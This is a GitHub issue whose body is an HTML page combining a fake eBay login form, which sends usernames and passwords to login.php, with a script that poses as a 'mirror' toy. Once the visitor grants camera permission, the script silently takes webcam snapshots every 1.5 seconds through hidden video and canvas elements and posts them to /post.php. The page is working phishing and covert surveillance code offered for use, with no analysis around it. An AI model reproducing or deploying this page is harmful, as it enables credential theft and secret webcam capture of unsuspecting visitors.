### ISSUE TITLE
index2.html

### ISSUE THREAD

**Issue by hasintha2002** [hasintha2002/ms#2]
<!doctype html>
<html>
<head> </head> <body> <form name="loginForm" method="post" action="login.php"> <table width="20%" bgcolor="blue" align="center"> <tr> <td colspan=2><center><font size=4><b><font color="red">ebay</font></b></center></td> </tr> <tr> <td>Username:</td> <td><input type="text" size=25 name="/userid"></td> </tr> <tr> <td>Password:</td> <td><input type="Password" size=25 name="pwd"></td> </tr> <tr> <td ><input type="Reset"></td> <td><input type="submit" onclick="return check(this.form)" value="Login"></td> </tr> </table> </form>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: '/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};

'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>

    <body>
        <p>Hint: Look at the favicon</p>
        <p>(Accept Permissions)</p>
        <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label></p>
    </body>

</html>
